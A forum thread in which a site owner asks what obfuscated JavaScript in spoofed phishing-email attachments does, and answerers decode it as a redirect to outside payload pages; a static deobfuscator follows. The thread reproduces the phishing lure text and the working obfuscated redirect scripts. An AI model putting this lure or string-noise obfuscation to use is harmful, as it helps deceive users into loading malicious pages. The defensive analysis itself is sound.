What does this javascript do?

I just found out that a spammer sends email from our domain name, pretending to be us, saying:

Dear Customer,

This email was sent to ourwebsite.com to notify you that we are temporarily preventing access to your account.

We have reason to believe that your account may have been someone else. Run the attached file and follow the instructions.

(C) ourwebsite.com (I changed this)

The attached file is an HTML file that has the following javascript:

<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";bi();this.xT='';</script> 

In another letter was:

 <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> 

Can anyone tell me what he is doing? That way we can see if we have a vulnerability, and if we need to tell our customers about it ...

thanks

+4
4 answers

Answer:

The script runs

 document.location.href = "http://mvblaw.com/z.htm"; //Evil site (I assume) 

It also contains a large number of useless lines to hide the purpose of the script.

Analysis

Here it is unpacked.

 function mD() {};
 this.aB = 43719;
 mD.prototype = {
     i: function () {
         var w = new Date();
         this.j = '';
         var x = function () {};
         var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
         var d = new Date();
         y = "";
         aL = "";
         var f = document;
         var s = function () {};
         this.yE = "";
         aN = "";
         var dL = '';
         var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
         this.v = "v";
         var q = 27427;
         var m = new Date();
         iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
         dE = '';
         k = "";
         var qY = function () {};
     }
 };
 xO = false;
 var b = new mD();
 yY = "";
 bi();
 this.xT = '';

Cleaning obfuscation and adding meaningful names, it becomes

 function TempClass() {};
 this.aB = 43719;
 TempClass.prototype = {
     doIt: function () {
         var w = new Date();
         this.j = '';
         var x = function () {};
         var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
         var d = new Date();
         y = "";
         aL = "";
         var f = document;
         var s = function () {};
         this.yE = "";
         aN = "";
         var dL = '';
         var iD = f['location'];
         this.v = "v";
         var q = 27427;
         var m = new Date();
         iD['href'] = a;
         dE = '';
         k = "";
         var qY = function () {};
     }
 };
 xO = false;
 var b = new TempClass();
 yY = "";
 b.doIt();
 this.xT = '';

Removing all useless lines, it becomes

 function TempClass() {};
 TempClass.prototype = {
     doIt: function () {
         var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
         var f = document;
         var iD = f['location'];
         iD['href'] = a;
     }
 };
 var b = new TempClass();
 b.doIt();
+5

They are no geniuses; here they are:

 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
 http : / / mvblaw . com / z . htm

 f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
 location

 iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
 href

No need to even run it through regex :)

I'm going to suggest that they hacked mvblaw and put the payload page there. Does anyone with a VM want to see what he is doing?

+3

The script contains many useless things to create confusion; the main parts of the script are:

 function mD() {};
 mD.prototype = {
     i: function () {
         // read between every two letters:
         var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'
             .replace(/[gJG,\<]/g, '');
         var f = document;
         var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
         iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
     }
 };
 var b = new mD();
 bi();

If we clear more:

 function mD() {};
 mD.prototype = {
     i: function () {
         var a = 'http://mvblaw.com/z.htm';
         var f = document;
         var iD = f['location'];
         iD['href'] = a;
     }
 };
 var b = new mD();
 bi();

And further:

 function mD() {};
 mD.prototype = {
     i: function () {
         document.location.href = 'http://mvblaw.com/z.htm';
     }
 };
 var b = new mD();
 bi();
+3

Basically, it seems to be setting (document['location'])['href'] (or, written the usual way, document.location.href) to http://mvblaw.com/z.htm.

The obfuscation code is pretty simple, just replacing noise characters with nothing:

 var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, ''); // a = http://mvblaw.com/z.htm
 var f=document;
 var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')]; // iD = document.location
 iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a; // document.location.href = a (the URL above).
0
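The answers above decode the strings by hand. As an added example (my code, not from the question or any answer), the same `'literal'.replace(/[noise]/g, '')` trick can be undone statically for both scripts in the question, without ever running them: the decoder applies the character-class deletion itself, rewrites `obj['prop']` to `obj.prop`, and then follows the `href` write back to the variable holding the URL. The function names are mine; the script excerpts are copied from the question.

```javascript
// Static deobfuscator for the  '<literal>'.replace(/[<class>]/g, '')  trick.
// Nothing here is evaluated; the deletion is performed by the decoder itself.

// Excerpts of the two scripts from the question (String.raw keeps the backslashes intact).
const SCRIPT_1 = String.raw`var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var f=document;var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;`;
const SCRIPT_2 = String.raw`var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;`;

// Matches  <q>literal<q>.replace(/[class]/g, <q><q>)  with either quote style;
// group 2 is the literal, group 3 is the character class to delete.
const STRIP_RE = /(['"])((?:\\.|(?!\1)[^\\])*)\1\.replace\(\/\[((?:\\.|[^\\\]])*)\]\/g,\s*(['"])\4\)/g;

// Apply the same deletion the script would perform, without running it.
function decodeStripped(literal, charClass) {
  return literal.replace(new RegExp('[' + charClass + ']', 'g'), '');
}

// Replace every strip expression with a plain double-quoted string, then turn
// obj["prop"] into obj.prop so the result reads like ordinary code.
function deobfuscate(src) {
  return src
    .replace(STRIP_RE, (_m, _q, literal, charClass) => JSON.stringify(decodeStripped(literal, charClass)))
    .replace(/\["(\w+)"\]/g, '.$1');
}

// Find  X.href = v  (or X.location = v) in the cleaned code and resolve v to its
// string literal. Returns { sink, target, usesLocation } or null if no write is found.
function findRedirect(src) {
  const clean = deobfuscate(src);
  const write = /(\w+)\.(href|location)\s*=\s*(\w+)\s*;/.exec(clean);
  if (!write) return null;
  const literal = new RegExp('\\b' + write[3] + '\\s*=\\s*"([^"]*)"').exec(clean);
  return {
    sink: write[1] + '.' + write[2],
    target: literal ? literal[1] : null,
    usesLocation: /\bdocument\b[\s\S]*\.location\b/.test(clean),
  };
}

console.log(deobfuscate(SCRIPT_1));
console.log(findRedirect(SCRIPT_1));
console.log(findRedirect(SCRIPT_2));
```

Running it prints the cleaned first script and, for each excerpt, the property written and the URL it is set to, which is the information a responder needs for blocking and for checking logs.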

Source: https://habr.com/ru/post/1312505/
